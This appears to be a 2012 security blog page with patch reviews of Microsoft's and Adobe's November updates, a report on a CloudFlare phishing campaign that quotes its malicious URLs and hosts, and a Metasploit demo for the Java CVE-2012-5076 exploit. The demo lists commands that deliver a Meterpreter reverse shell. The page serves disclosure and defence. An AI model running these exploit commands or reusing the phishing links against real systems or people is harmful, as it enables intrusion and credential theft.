Microsoft November 2012 Patch Tuesday Review

Vulnerability Management

Microsoft has release, the 13 November 2012, during his November Patch Tuesday, two updated security advisories and six security bulletins. On the six security bulletins four of them has a Critical security rating.

Microsoft Security Advisory 2269637

MSA-2269637, released during August 2010, has been updated. The security advisory is regarding “Insecure Library Loading” and the update has add the reference to MS12-074 “Vulnerabilities in .NET Framework Could Allow Remote Code Execution“.

Microsoft Security Advisory 2749655

MSA-2749655, release during October 2012, has been updated. The security advisory is regarding “Compatibility Issues Affecting Signed Microsoft Binaries” and the update has modify the reference to KBs of “Microsoft Office 2003 Service Pack 3” updates.

MS12-071 – Cumulative Security Update for Internet Explorer

MS12-071 security update, classified as Critical, allowing remote code execution, is the fix for three privately reported vulnerabilities. CVE-2012-1538 has a 9.3 CVSS base score and was discovered and privately reported by Jose A. Vazquez of spa-s3c.blogspot.com, working with VeriSign iDefense LabsCVE-2012-1539 has a 10.0 CVSS base score and was discovered and privately reported by Jose A. Vazquez of spa-s3c.blogspot.com, working with VeriSign iDefense LabsCVE-2012-4775 has a 9.3 CVSS base score and was discovered and privately reported by Cheng-da Tsai (Orange), Sung-ting Tsai, and Ming-chieh Pan (Nanika) of Trend Micro.

Affected software is:

  • Internet Explorer 9

MS12-072 – Vulnerabilities in Windows Shell Could Allow Remote Code Execution

MS12-072 security update, classified as Critical, allowing remote code execution, is fixing two privately reported vulnerabilities. CVE-2012-1527 has a 9.3 CVSS base score and was discovered and privately reported by Tal Zeltzer, working with VeriSign iDefense LabsCVE-2012-1528 has a 9.3 CVSS base score and was discovered and privately reported by Tal Zeltzer, working with VeriSign iDefense Labs.

Affected softwares are:

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for 64-bit Systems
  • Windows Server 2012

MS12-074 – Vulnerabilities in .NET Framework Could Allow Remote Code Execution

MS12-074 security update, classified as Critical, allowing remote code execution, is fixing five privately vulnerabilities. CVE-2012-1895 has a 9.3 CVSS base score and was discovered and privately reported by James Forshaw of Context Information Security. CVE-2012-1896 has a 5.0 CVSS base score and was discovered and privately reported by James Forshaw of Context Information Security. CVE-2012-2519 has a 7.9 CVSS base score and was discovered and privately reported. CVE-2012-4776 has a 9.3 CVSS base score and was discovered and privately reported by James Forshaw of Context Information Security. CVE-2012-4777 has a 9.3 CVSS base score and was discovered and privately reported by James Forshaw of Context Information Security.

Affected softwares are:

  • Microsoft .NET Framework 1.1 Service Pack 1
  • Microsoft .NET Framework 1.0 Service Pack 3
  • Microsoft .NET Framework 2.0 Service Pack 2
  • Microsoft .NET Framework 1.1
  • Microsoft .NET Framework 3.5
  • Microsoft .NET Framework 3.5.1
  • Microsoft .NET Framework 4
  • Microsoft .NET Framework 4.5

MS12-075 – Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution

MS12-075 security update, classified as Important, allowing remote code execution, is fixing three privately reported vulnerabilities. CVE-2012-2530 has a 7.2 CVSS base score and was discovered and privately reported. CVE-2012-2553 has a 7.2 CVSS base score and was discovered and privately reported by Matthew Jurczyk of Google IncCVE-2012-2897 has a 10.0 CVSS base score and was discovered and privately reported by Eetu Luodemaa and Joni Vähämäki of Documill, working with the Chromium Security Rewards Program.

Affected softwares are:

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for 64-bit Systems
  • Windows Server 2012

MS12-076 – Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution

MS12-076 security update, classified as Important, allowing remote code execution, is fixing four privately reported vulnerabilities. CVE-2012-1885 has a 9.3 CVSS base score and was discovered and privately reported by Sean Larsson, working with the iDefense VCPCVE-2012-1886 has a 9.3 CVSS base score and was discovered and privately reported by an anonymous researcher, working with the iDefense VCPCVE-2012-1887 has a 9.3 CVSS base score and was discovered and privately reported by an anonymous researcher, working with the iDefense VCPCVE-2012-2543 has a 9.3 CVSS base score and was discovered and privately reported by an anonymous researcher, working with HP TippingPoint’s Zero Day Initiative.

Affected softwares are:

  • Microsoft Office 2003 Service Pack 3
  • Microsoft Office 2007 Service Pack 2
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 1 (32-bit editions)
  • Microsoft Office 2010 Service Pack 1 (64-bit editions)
  • Microsoft Office 2008 for Mac
  • Microsoft Office for Mac 2011
  • Microsoft Excel Viewer
  • Microsoft Office Compatibility Pack Service Pack 2
  • Microsoft Office Compatibility Pack Service Pack 3

MS12-073- Vulnerability in Kerberos Could Allow Denial of Service

MS12-073 security update, classified as Moderate, allowing information disclosure, is fixing two vulnerabilities. CVE-2012-2531 has a 2.1 CVSS base score and was discovered and privately reported by Justin Royce of ProDX. CVE-2012-2532 has a 5.0 CVSS base score and was discovered and publicly reported.

Affected softwares are:

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

CloudFlare Phishing Email Campaign “Confirmation data changes”

Various

Today, I received on one of my email address a CloudFlare phishing email “CLOUDFLARE.COM. domain.com: Confirmation data changes“.

As you can see this in the above screenshot, the phishing email claim that you’re CloudFlare account has exceeded the limit load available and that the account will be blocked if you don’t adapt the rate plan of the account.

The malicious link “https://cloudflare.com/login/?user=9647dec8-7e4c-40d6-bf15-43e3bd9233d3” was redirecting to “http://cloudflare.com.login.9437dec8-7e4c-40d6-bf15-43e3bd9226d3.alert-cloudflare.com.swteh.ru/login.php?domain=zataz.com” hosted on 77.222.41.100 (Russian SpaceWeb.ru Hosting Provider – AS44112).

I found another malicious link, on a Russian forum:

http://cloudflare.com.login.1647dec1-1e4c-50d6-bf15-43e4bd9133d9.alert-cloudflare.com.swteh.ru/login.php?domain=xxxxx.com” located on the same server.

In the email headers we can see that the phishing has been sent by “grafias.lunarpages.com” hosted on 216.97.235.15 in US.

CloudFlare users have alert CloudFlare team through a post in the support forum and then an alert has been raised to all CloudFlare customers.

CVE-2012-5076 Java Applet JAX-WS Remote Code Execution Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability patched by Oracle in 2012 October CPU
Vulnerability discovered exploited in the wild by @kafeine the 2012-11-09
Metasploit PoC provided by juan vazquez the 2012-11-11

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5076
OSVDB-86363
BID-56054
Oracle October 2012 CPU
Cool EK : “Hello my friend…”

Affected version(s) :

Java 1.7.0_07-b10 and earlier

Tested on Windows XP Pro SP3 with :

Java 1.7.0_07-b10

Description :

This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_jaxws
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo

APSB12-24 – Adobe November 2012 Patch Tuesday Review

Vulnerability Management,

Adobe has release, the 6 November 2012, during his November Patch Tuesday, one security bulletin dealing with 7 vulnerabilities. All these security bulletins have a Critical severity rating. All of these vulnerabilities have a CVSS base score of 10.0.

APSB12-24 – Security updates available for Adobe Flash Player

APSB12-24 is concerning :

  • Adobe Flash Player 11.4.402.287 and earlier versions for Windows and Macintosh
  • Adobe Flash Player 11.2.202.243 and earlier versions for Linux
  • Adobe Flash Player 11.2.202.238 and earlier versions for Linux
  • Adobe Flash Player 11.1.115.20 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.19 and earlier versions for Android 3.x and 2.x
  • Adobe AIR 3.4.0.2710 and earlier versions for Windows and Macintosh, SDK (includes AIR for iOS) and Android

CVE-2012-5274 (CVSS base score of 10.0), CVE-2012-5275 (CVSS base score of 10.0), CVE-2012-5276 (CVSS base score of 10.0), CVE-2012-5277 (CVSS base score of 10.0), CVE-2012-5279 (CVSS base score of 10.0), CVE-2012-5280 (CVSS base score of 10.0) have been discovered and reported by Mateusz Jurczyk, Gynvael Coldwind, and Fermin Serna of the Google Security Team.

CVE-2012-5278 (CVSS base score of 10.0) has been discovered and reported by Eduardo Vela Nava of the Google Security Team.

I advise you to update asap your Adobe Flash Player.